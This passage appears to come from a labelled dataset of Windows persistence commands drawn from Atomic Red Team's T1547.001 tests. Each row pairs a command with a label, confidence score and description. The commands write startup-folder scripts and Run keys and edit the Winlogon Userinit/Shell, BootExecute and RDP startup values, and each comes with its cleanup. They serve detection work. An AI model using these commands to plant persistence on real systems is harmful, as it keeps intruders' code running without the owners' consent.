""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"" Copy-Item ""$PathToAtomicsFolder\T1547.001\src\jsestartup.jse"" ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"" cscript.exe /E:Jscript ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"" cscript.exe /E:Jscript ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Suspicious jse file run from startup Folder,T1547.001,"[""T1547.001""]",windows,0.9,False,"jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, ""T1547.001 Hello, World JSE!"" will be displayed twice. Additionally, the new files can be viewed in the ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"" folder and will also run when the computer is restarted and the user logs in. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review faa981294228e668e7ab3511,"Remove-Item ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"" -ErrorAction Ignore Remove-Item ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"" -ErrorAction Ignore","Remove-Item ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\jsestartup.jse"" -ErrorAction Ignore Remove-Item ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\jsestartup.jse"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Suspicious jse file run from startup Folder,T1547.001,"[""T1547.001""]",windows,0.55,True,"jse files can be placed in and ran from the startup folder to maintain persistance. Upon execution, ""T1547.001 Hello, World JSE!"" will be displayed twice. Additionally, the new files can be viewed in the ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"" folder and will also run when the computer is restarted and the user logs in. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8a08e80b84cef4adee682723,"Copy-Item ""$PathToAtomicsFolder\T1547.001\src\batstartup.bat"" ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"" Copy-Item ""$PathToAtomicsFolder\T1547.001\src\batstartup.bat"" ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"" Start-Process ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"" Start-Process ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat""","Copy-Item ""$PathToAtomicsFolder\T1547.001\src\batstartup.bat"" ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"" Copy-Item ""$PathToAtomicsFolder\T1547.001\src\batstartup.bat"" ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"" Start-Process ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"" Start-Process ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Suspicious bat file run from startup Folder,T1547.001,"[""T1547.001""]",windows,0.9,False,"bat files can be placed in and executed from the startup folder to maintain persistance Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"" folder and will also run when the computer is restarted and the user logs in. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 91813cb7ff47e155f9c3c19f,"Remove-Item ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"" -ErrorAction Ignore Remove-Item ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"" -ErrorAction Ignore","Remove-Item ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"" -ErrorAction Ignore Remove-Item ""C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Suspicious bat file run from startup Folder,T1547.001,"[""T1547.001""]",windows,0.55,True,"bat files can be placed in and executed from the startup folder to maintain persistance Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"" folder and will also run when the computer is restarted and the user logs in. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8ea4437fc684615ddbfb958e,"$Target = ""C:\Windows\System32\calc.exe"" $ShortcutLocation = ""$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"" $WScriptShell = New-Object -ComObject WScript.Shell $Create = $WScriptShell.CreateShortcut($ShortcutLocation) $Create.TargetPath = $Target $Create.Save()","$Target = ""C:\Windows\System32\calc.exe"" $ShortcutLocation = ""$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"" $WScriptShell = New-Object -ComObject WScript.Shell $Create = $WScriptShell.CreateShortcut($ShortcutLocation) $Create.TargetPath = $Target $Create.Save()",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Add Executable Shortcut Link to User Startup Folder,T1547.001,"[""T1547.001""]",windows,0.9,False,Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. ,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 49d3333d3a79866a956e40b2,"Remove-Item ""$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"" -ErrorAction Ignore","Remove-Item ""$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Add Executable Shortcut Link to User Startup Folder,T1547.001,"[""T1547.001""]",windows,0.55,True,Adds a non-malicious executable shortcut link to the current users startup directory. Test can be verified by going to the users startup directory and checking if the shortcut link exists. ,unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 69be49205bdf2ba5e32fa38a,"reg ADD ""HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command"" /ve /d ""calc.exe"" /f","reg ADD ""HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command"" /ve /d ""calc.exe"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Add persistance via Recycle bin,T1547.001,"[""T1547.001""]",windows,0.9,False,"Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf) User have to clic on the recycle bin to lauch the payload (here calc) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 19d38a5d326298a2be47dd31,"reg DELETE ""HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"" /f","reg DELETE ""HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open"" /f",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Add persistance via Recycle bin,T1547.001,"[""T1547.001""]",windows,0.55,True,"Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf) User have to clic on the recycle bin to lauch the payload (here calc) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 3d6f7bea83c39041d59b5a5f,"$RunKey = ""#{reg_key_path}"" Set-ItemProperty -Path $RunKey -Name ""socks5_powershell"" -Value ""#{reg_key_value}""","$RunKey = ""#{reg_key_path}"" Set-ItemProperty -Path $RunKey -Name ""socks5_powershell"" -Value ""#{reg_key_value}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,SystemBC Malware-as-a-Service Registry,T1547.001,"[""T1547.001""]",windows,0.9,False,"This Atomic will create a registry key called socks5_powershell for persistance access https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 539f5c8d2fb8869eb3dad071,"Remove-ItemProperty -Path #{reg_key_path} -Name ""socks5_powershell"" -Force -ErrorAction Ignore","Remove-ItemProperty -Path #{reg_key_path} -Name ""socks5_powershell"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,SystemBC Malware-as-a-Service Registry,T1547.001,"[""T1547.001""]",windows,0.55,True,"This Atomic will create a registry key called socks5_powershell for persistance access https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 615da66c1b58434b509d077d,"New-Item -ItemType Directory -path ""#{new_startup_folder}"" Copy-Item -path ""#{payload}"" -destination ""#{new_startup_folder}"" Set-ItemProperty -Path ""HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" -Name ""Common Startup"" -Value ""#{new_startup_folder}""","New-Item -ItemType Directory -path ""#{new_startup_folder}"" Copy-Item -path ""#{payload}"" -destination ""#{new_startup_folder}"" Set-ItemProperty -Path ""HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" -Name ""Common Startup"" -Value ""#{new_startup_folder}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,T1547.001,"[""T1547.001""]",windows,0.9,False,"This test will modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V ""Common Startup"" value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 6820ce861aece2a3fd633054,"Set-ItemProperty -Path ""HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" -Name ""Common Startup"" -Value ""%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"" Remove-Item ""#{new_startup_folder}"" -Recurse -Force","Set-ItemProperty -Path ""HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" -Name ""Common Startup"" -Value ""%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"" Remove-Item ""#{new_startup_folder}"" -Recurse -Force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value,T1547.001,"[""T1547.001""]",windows,0.55,True,"This test will modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V ""Common Startup"" value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8caebdba820769804fe92eb3,"New-Item -ItemType Directory -path ""#{new_startup_folder}"" Copy-Item -path ""#{payload}"" -destination ""#{new_startup_folder}"" Set-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" -Name ""Startup"" -Value ""#{new_startup_folder}""","New-Item -ItemType Directory -path ""#{new_startup_folder}"" Copy-Item -path ""#{payload}"" -destination ""#{new_startup_folder}"" Set-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" -Name ""Startup"" -Value ""#{new_startup_folder}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,T1547.001,"[""T1547.001""]",windows,0.9,False,"This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V ""Startup"" value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e1243653246541e32d7d33d4,"Set-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" -Name ""Startup"" -Value ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"" Remove-Item ""#{new_startup_folder}"" -Recurse -Force","Set-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"" -Name ""Startup"" -Value ""$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"" Remove-Item ""#{new_startup_folder}"" -Recurse -Force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Change Startup Folder - HKCU Modify User Shell Folders Startup Value,T1547.001,"[""T1547.001""]",windows,0.55,True,"This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V ""Startup"" value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e5317d2d5c7eb53c9da80a49,"if (!(Test-Path -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"")){ New-Item -ItemType Key -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" } if (!(Test-Path -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"")){ New-Item -ItemType Key -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" } Set-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" -Name ""#{target_key_value_name}"" -Value ""#{payload}""","if (!(Test-Path -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"")){ New-Item -ItemType Key -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"" } if (!(Test-Path -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"")){ New-Item -ItemType Key -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" } Set-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" -Name ""#{target_key_value_name}"" -Value ""#{payload}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,HKCU - Policy Settings Explorer Run Key,T1547.001,"[""T1547.001""]",windows,0.9,False,"This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot. *Requires reboot ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ea5230f373a4ec387f868571,"Remove-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" -Name ""#{target_key_value_name}""","Remove-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" -Name ""#{target_key_value_name}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,HKCU - Policy Settings Explorer Run Key,T1547.001,"[""T1547.001""]",windows,0.55,True,"This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot. *Requires reboot ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cf5aeaa64fe91ae8fe4d77fb,"if (!(Test-Path -Path ""HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"")){ New-Item -ItemType Key -Path ""HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" } Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" -Name ""#{target_key_value_name}"" -Value ""#{payload}""","if (!(Test-Path -Path ""HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"")){ New-Item -ItemType Key -Path ""HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" } Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" -Name ""#{target_key_value_name}"" -Value ""#{payload}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,HKLM - Policy Settings Explorer Run Key,T1547.001,"[""T1547.001""]",windows,0.9,False,"This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot. *Requires reboot ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5a7555f9f2cdfa10819ed4bf,"Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" -Name ""#{target_key_value_name}""","Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"" -Name ""#{target_key_value_name}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,HKLM - Policy Settings Explorer Run Key,T1547.001,"[""T1547.001""]",windows,0.55,True,"This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot. *Requires reboot ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review e714a8d0bf7ac5e0fb5b7e58,"$oldvalue = $(Get-ItemPropertyValue -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Userinit""); Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Userinit-backup"" -Value ""$oldvalue""; $newvalue = $oldvalue + "" #{payload}""; Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Userinit"" -Value ""$newvalue""","$oldvalue = $(Get-ItemPropertyValue -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Userinit""); Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Userinit-backup"" -Value ""$oldvalue""; $newvalue = $oldvalue + "" #{payload}""; Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Userinit"" -Value ""$newvalue""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,HKLM - Append Command to Winlogon Userinit KEY Value,T1547.001,"[""T1547.001""]",windows,0.9,False,"This test will append a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot. * Requires reboot ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eddab89cffe869c25042fd77,"$oldvalue = $(Get-ItemPropertyValue -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name 'Userinit-backup'); Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Userinit"" -Value ""$oldvalue""; Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name 'Userinit-backup'","$oldvalue = $(Get-ItemPropertyValue -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name 'Userinit-backup'); Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Userinit"" -Value ""$oldvalue""; Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name 'Userinit-backup'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,HKLM - Append Command to Winlogon Userinit KEY Value,T1547.001,"[""T1547.001""]",windows,0.55,True,"This test will append a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot. * Requires reboot ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4668e665db21b3dd49892a55,"$oldvalue = $(Get-ItemPropertyValue -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Shell""); Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Shell-backup"" -Value ""$oldvalue""; $newvalue = $oldvalue + "", #{payload}""; Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Shell"" -Value ""$newvalue""","$oldvalue = $(Get-ItemPropertyValue -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Shell""); Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Shell-backup"" -Value ""$oldvalue""; $newvalue = $oldvalue + "", #{payload}""; Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Shell"" -Value ""$newvalue""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,T1547.001,"[""T1547.001""]",windows,0.9,False,"This test change the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from ""explorer.exe"" to the full path of ""C:\Windows\explorer.exe"" to log a change to the key's default value without breaking boot sequence. An atacker will alternatively replace this with a custom shell. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review a149e877dfaf6b8fbacaacb0,"$oldvalue = $(Get-ItemPropertyValue -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name 'Shell-backup'); Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Shell"" -Value ""$oldvalue""; Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name 'Shell-backup'","$oldvalue = $(Get-ItemPropertyValue -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name 'Shell-backup'); Set-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name ""Shell"" -Value ""$oldvalue""; Remove-ItemProperty -Path ""HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"" -Name 'Shell-backup'",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,HKLM - Modify default System Shell - Winlogon Shell KEY Value ,T1547.001,"[""T1547.001""]",windows,0.55,True,"This test change the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from ""explorer.exe"" to the full path of ""C:\Windows\explorer.exe"" to log a change to the key's default value without breaking boot sequence. An atacker will alternatively replace this with a custom shell. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 96e1fdf6bb30dbee783fb9db,"secedit /import /db #{secedit_db} /cfg ""#{ini_file}"" secedit /configure /db #{secedit_db}","secedit /import /db #{secedit_db} /cfg ""#{ini_file}"" secedit /configure /db #{secedit_db}",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,secedit used to create a Run key in the HKLM Hive,T1547.001,"[""T1547.001""]",windows,0.9,False,"secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive. [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 36724a71252c54e1ed074d7c,"REG DELETE ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /V ""calc"" /f >nul 2>&1","REG DELETE ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /V ""calc"" /f >nul 2>&1",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,secedit used to create a Run key in the HKLM Hive,T1547.001,"[""T1547.001""]",windows,0.55,True,"secedit allows to manipulate the HKLM hive of the Windows registry. This test creates a Run key with the keyname calc having calc.exe as the value in the HKLM hive. [Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d) ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cbd120a647b6d2c4cf5429a3,"if (!(Test-Path ""$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"")) { reg.exe export ""HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"" ""$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"" /y } Set-ItemProperty -Path ""HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager"" -Name ""BootExecute"" -Value ""#{registry_value}"" -Type MultiString","if (!(Test-Path ""$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"")) { reg.exe export ""HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"" ""$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"" /y } Set-ItemProperty -Path ""HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager"" -Name ""BootExecute"" -Value ""#{registry_value}"" -Type MultiString",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Modify BootExecute Value,T1547.001,"[""T1547.001""]",windows,0.9,False,"This test modifies the BootExecute registry value to ""autocheck autoche *"", which can be used to simulate an adversary's attempt to tamper with the system's boot process. Reference - https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf NOTE that by not saving the correct value, you may inhibit your system from booting properly. Only run on a test system. There is a reg export before running the Atomic. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review bdb53f17ebdb8cea1f1dbf3f,"reg.exe import ""$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"" Remove-Item -Path ""$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"" -Force","reg.exe import ""$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"" Remove-Item -Path ""$PathToAtomicsFolder\T1547.001\src\SessionManagerBackup.reg"" -Force",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Modify BootExecute Value,T1547.001,"[""T1547.001""]",windows,0.55,True,"This test modifies the BootExecute registry value to ""autocheck autoche *"", which can be used to simulate an adversary's attempt to tamper with the system's boot process. Reference - https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf NOTE that by not saving the correct value, you may inhibit your system from booting properly. Only run on a test system. There is a reg export before running the Atomic. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review b9cc0096d1b5ef9102d5ebc4,"reg add ""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"" /f /v StartupPrograms /t REG_SZ /d ""#{malicious_app}""","reg add ""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"" /f /v StartupPrograms /t REG_SZ /d ""#{malicious_app}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Allowing custom application to execute during new RDP logon session,T1547.001,"[""T1547.001""]",windows,0.9,False,"When a users logs in to a computer via RDP,Windows will search for the key in HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd registry By default, rdpclip is the value stored. An attacker with administrator privileges can alter the value stored to allow for the custom application to execute during RDP login session.The test will allow running cal rather rdpclip when a user logs in via RDP ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 45fee707521e24a8a5b9e08d,"reg add ""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"" /f /v StartupPrograms /t REG_SZ /d ""rdpclip""","reg add ""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd"" /f /v StartupPrograms /t REG_SZ /d ""rdpclip""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.001/T1547.001.yaml,Allowing custom application to execute during new RDP logon session,T1547.001,"[""T1547.001""]",windows,0.55,True,"When a users logs in to a computer via RDP,Windows will search for the key in HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd registry By 